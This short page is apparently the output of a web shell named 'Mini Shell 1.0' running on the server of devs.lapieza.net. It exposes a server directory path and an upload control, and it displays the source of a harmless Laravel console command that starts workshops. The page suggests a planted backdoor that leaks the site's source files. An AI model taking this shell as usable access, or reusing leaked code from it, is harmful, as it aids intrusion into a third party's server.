HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/devs.lapieza.net/app/Console/Commands/
Upload File :
Current File : /var/www/devs.lapieza.net/app/Console/Commands/WorkshopsStartCommand.php
<?php

namespace App\Console\Commands;

use App\Http\Controllers\Mensajeria\WorkShopController;
use Illuminate\Console\Command;

class WorkshopsStartCommand extends Command
{
    protected $signature = 'workshops:start';

    protected $description = 'Start every day a workshops';

    public function handle(): void {
        WorkShopController::startWorkshops();
    }
}